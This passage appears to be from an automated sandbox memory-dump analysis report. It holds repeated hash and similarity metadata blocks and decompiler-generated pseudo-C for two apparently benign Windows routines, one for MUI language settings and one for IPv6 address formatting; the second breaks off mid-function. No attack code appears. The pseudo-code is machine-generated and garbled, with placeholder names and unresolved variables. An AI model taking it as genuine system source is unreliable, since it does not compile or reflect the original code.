                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                        • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                        • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                        • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                        • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                        • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                        • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                        • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                        • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                        • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                        • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                        • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                        • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                        • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                        • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                        • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                        • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                        • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                        • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                        • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                        • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                        • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                        • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                        • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                        • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                        • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                        • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                        • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 94%
                                                        			E00B68788(signed int __ecx, void* __edx, signed int _a4) {
                                                        				signed int _v8;
                                                        				short* _v12;
                                                        				void* _v16;
                                                        				signed int _v20;
                                                        				char _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				char _v44;
                                                        				signed int _v48;
                                                        				signed int _v52;
                                                        				signed int _v56;
                                                        				signed int _v60;
                                                        				char _v68;
                                                        				void* _t216;
                                                        				intOrPtr _t231;
                                                        				short* _t235;
                                                        				intOrPtr _t257;
                                                        				short* _t261;
                                                        				intOrPtr _t284;
                                                        				intOrPtr _t288;
                                                        				void* _t314;
                                                        				signed int _t318;
                                                        				short* _t319;
                                                        				intOrPtr _t321;
                                                        				void* _t328;
                                                        				void* _t329;
                                                        				char* _t332;
                                                        				signed int _t333;
                                                        				signed int* _t334;
                                                        				void* _t335;
                                                        				void* _t338;
                                                        				void* _t339;
                                                        
                                                        				_t328 = __edx;
                                                        				_t322 = __ecx;
                                                        				_t318 = 0;
                                                        				_t334 = _a4;
                                                        				_v8 = 0;
                                                        				_v28 = 0;
                                                        				_v48 = 0;
                                                        				_v20 = 0;
                                                        				_v40 = 0;
                                                        				_v32 = 0;
                                                        				_v52 = 0;
                                                        				if(_t334 == 0) {
                                                        					_t329 = 0xc000000d;
                                                        					L49:
                                                        					_t334[0x11] = _v56;
                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                        					_t334[0x12] = _v60;
                                                        					_t334[0x13] = _v28;
                                                        					_t334[0x17] = _v20;
                                                        					_t334[0x16] = _v48;
                                                        					_t334[0x18] = _v40;
                                                        					_t334[0x14] = _v32;
                                                        					_t334[0x15] = _v52;
                                                        					return _t329;
                                                        				}
                                                        				_v56 = 0;
                                                        				if(E00B68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_v56 = 1;
                                                        					if(_v8 != 0) {
                                                        						_t207 = E00B4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        					}
                                                        					_push(1);
                                                        					_v8 = _t318;
                                                        					E00B6718A(_t207);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_v60 = _v60 | 0xffffffff;
                                                        				if(E00B68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_t333 =  *_v8;
                                                        					_v60 = _t333;
                                                        					_t314 = E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					_push(_t333);
                                                        					_v8 = _t318;
                                                        					E00B6718A(_t314);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_t216 = E00B68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                        				_t332 = ";";
                                                        				if(_t216 < 0) {
                                                        					L17:
                                                        					if(E00B68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                        						L30:
                                                        						if(E00B68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                        							L46:
                                                        							_t329 = 0;
                                                        							L47:
                                                        							if(_v8 != _t318) {
                                                        								E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        							}
                                                        							if(_v28 != _t318) {
                                                        								if(_v20 != _t318) {
                                                        									E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        									_v20 = _t318;
                                                        									_v40 = _t318;
                                                        								}
                                                        							}
                                                        							goto L49;
                                                        						}
                                                        						_t231 = _v24;
                                                        						_t322 = _t231 + 4;
                                                        						_push(_t231);
                                                        						_v52 = _t322;
                                                        						E00B6718A(_t231);
                                                        						if(_t322 == _t318) {
                                                        							_v32 = _t318;
                                                        						} else {
                                                        							_v32 = E00B4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        						}
                                                        						if(_v32 == _t318) {
                                                        							_v52 = _t318;
                                                        							L58:
                                                        							_t329 = 0xc0000017;
                                                        							goto L47;
                                                        						} else {
                                                        							E00B42340(_v32, _v8, _v24);
                                                        							_v16 = _v32;
                                                        							_a4 = _t318;
                                                        							_t235 = E00B5E679(_v32, _t332);
                                                        							while(1) {
                                                        								_t319 = _t235;
                                                        								if(_t319 == 0) {
                                                        									break;
                                                        								}
                                                        								 *_t319 = 0;
                                                        								_t321 = _t319 + 2;
                                                        								E00B4E2A8(_t322,  &_v68, _v16);
                                                        								if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        								_v16 = _t321;
                                                        								_t235 = E00B5E679(_t321, _t332);
                                                        								_pop(_t322);
                                                        							}
                                                        							_t236 = _v16;
                                                        							if( *_v16 != _t319) {
                                                        								E00B4E2A8(_t322,  &_v68, _t236);
                                                        								if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        							}
                                                        							if(_a4 == 0) {
                                                        								E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                        								_v52 = _v52 & 0x00000000;
                                                        								_v32 = _v32 & 0x00000000;
                                                        							}
                                                        							if(_v8 != 0) {
                                                        								E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        							}
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_t318 = 0;
                                                        							goto L46;
                                                        						}
                                                        					}
                                                        					_t257 = _v24;
                                                        					_t322 = _t257 + 4;
                                                        					_push(_t257);
                                                        					_v40 = _t322;
                                                        					E00B6718A(_t257);
                                                        					_t338 = _t335 + 4;
                                                        					if(_t322 == _t318) {
                                                        						_v20 = _t318;
                                                        					} else {
                                                        						_v20 = E00B4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        					}
                                                        					if(_v20 == _t318) {
                                                        						_v40 = _t318;
                                                        						goto L58;
                                                        					} else {
                                                        						E00B42340(_v20, _v8, _v24);
                                                        						_v16 = _v20;
                                                        						_a4 = _t318;
                                                        						_t261 = E00B5E679(_v20, _t332);
                                                        						_t335 = _t338 + 0x14;
                                                        						while(1) {
                                                        							_v12 = _t261;
                                                        							if(_t261 == _t318) {
                                                        								break;
                                                        							}
                                                        							_v12 = _v12 + 2;
                                                        							 *_v12 = 0;
                                                        							E00B4E2A8(_v12,  &_v68, _v16);
                                                        							if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        							_v16 = _v12;
                                                        							_t261 = E00B5E679(_v12, _t332);
                                                        							_pop(_t322);
                                                        						}
                                                        						_t269 = _v16;
                                                        						if( *_v16 != _t318) {
                                                        							E00B4E2A8(_t322,  &_v68, _t269);
                                                        							if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        						}
                                                        						if(_a4 == _t318) {
                                                        							E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        							_v40 = _t318;
                                                        							_v20 = _t318;
                                                        						}
                                                        						if(_v8 != _t318) {
                                                        							E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        						}
                                                        						_v8 = _t318;
                                                        						goto L30;
                                                        					}
                                                        				}
                                                        				_t284 = _v24;
                                                        				_t322 = _t284 + 4;
                                                        				_push(_t284);
                                                        				_v48 = _t322;
                                                        				E00B6718A(_t284);
                                                        				_t339 = _t335 + 4;
                                                        				if(_t322 == _t318) {
                                                        					_v28 = _t318;
                                                        				} else {
                                                        					_v28 = E00B4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        				}
                                                        				if(_v28 == _t318) {
                                                        					_v48 = _t318;
                                                        					goto L58;
                                                        				} else {
                                                        					E00B42340(_v28, _v8, _v24);
                                                        					_v16 = _v28;
                                                        					_a4 = _t318;
                                                        					_t288 = E00B5E679(_v28, _t332);
                                                        					_t335 = _t339 + 0x14;
                                                        					while(1) {
                                                        						_v12 = _t288;
                                                        						if(_t288 == _t318) {
                                                        							break;
                                                        						}
                                                        						_v12 = _v12 + 2;
                                                        						 *_v12 = 0;
                                                        						E00B4E2A8(_v12,  &_v68, _v16);
                                                        						if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        						_v16 = _v12;
                                                        						_t288 = E00B5E679(_v12, _t332);
                                                        						_pop(_t322);
                                                        					}
                                                        					_t296 = _v16;
                                                        					if( *_v16 != _t318) {
                                                        						E00B4E2A8(_t322,  &_v68, _t296);
                                                        						if(E00B65553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        					}
                                                        					if(_a4 == _t318) {
                                                        						E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                        						_v48 = _t318;
                                                        						_v28 = _t318;
                                                        					}
                                                        					if(_v8 != _t318) {
                                                        						E00B4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					}
                                                        					_v8 = _t318;
                                                        					goto L17;
                                                        				}
                                                        			}






































                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-SKU, xrefs: 00B689FC
                                                        • Kernel-MUI-Language-Allowed, xrefs: 00B68827
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00B68914
                                                        • WindowsExcludedProcs, xrefs: 00B687C1
                                                        • Kernel-MUI-Number-Allowed, xrefs: 00B687E6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 4b1667188243e30cd696b7fa4f92352ad18428568e0c9c2ad77a74bcbad1ccb3
                                                        • Instruction ID: f23902d790b1697aa9376a99a9497f5c684de302deb716618c5d6d6db3c50100
                                                        • Opcode Fuzzy Hash: 4b1667188243e30cd696b7fa4f92352ad18428568e0c9c2ad77a74bcbad1ccb3
                                                        • Instruction Fuzzy Hash: 2AF1D3B2D00209EFCF11DF98C981AEEBBF8FB08300F1445AAE515A7251EB75DA45DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 38%
                                                        			E00B813CB(intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr* _v16;
                                                        				intOrPtr _v20;
                                                        				char _v24;
                                                        				intOrPtr _t71;
                                                        				signed int _t78;
                                                        				signed int _t86;
                                                        				char _t90;
                                                        				signed int _t91;
                                                        				signed int _t96;
                                                        				intOrPtr _t108;
                                                        				signed int _t114;
                                                        				void* _t115;
                                                        				intOrPtr _t128;
                                                        				intOrPtr* _t129;
                                                        				void* _t130;
                                                        
                                                        				_t129 = _a4;
                                                        				_t128 = _a8;
                                                        				_t116 = 0;
                                                        				_t71 = _t128 + 0x5c;
                                                        				_v8 = 8;
                                                        				_v20 = _t71;
                                                        				if( *_t129 == 0) {
                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                        						goto L5;
                                                        					} else {
                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                        						if(_t96 != 0) {
                                                        							L38:
                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                        								goto L5;
                                                        							} else {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t86 = E00B77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                        								L36:
                                                        								return _t128 + _t86 * 2;
                                                        							}
                                                        						}
                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                        						if(_t114 == 0) {
                                                        							L33:
                                                        							_t115 = 0xb42926;
                                                        							L35:
                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                        							_t86 = E00B77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                        							goto L36;
                                                        						}
                                                        						if(_t114 != 0xffff) {
                                                        							_t116 = 0;
                                                        							goto L38;
                                                        						}
                                                        						if(_t114 != 0) {
                                                        							_t115 = 0xb49cac;
                                                        							goto L35;
                                                        						}
                                                        						goto L33;
                                                        					}
                                                        				} else {
                                                        					L5:
                                                        					_a8 = _t116;
                                                        					_a4 = _t116;
                                                        					_v12 = _t116;
                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                        							_v8 = 6;
                                                        						}
                                                        					}
                                                        					_t90 = _v8;
                                                        					if(_t90 <= _t116) {
                                                        						L11:
                                                        						if(_a8 - _a4 <= 1) {
                                                        							_a8 = _t116;
                                                        							_a4 = _t116;
                                                        						}
                                                        						_t91 = 0;
                                                        						if(_v8 <= _t116) {
                                                        							L22:
                                                        							if(_v8 < 8) {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t128 = _t128 + E00B77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                        							}
                                                        							return _t128;
                                                        						} else {
                                                        							L14:
                                                        							L14:
                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                        									_push(":");
                                                        									_push(_t71 - _t128 >> 1);
                                                        									_push(_t128);
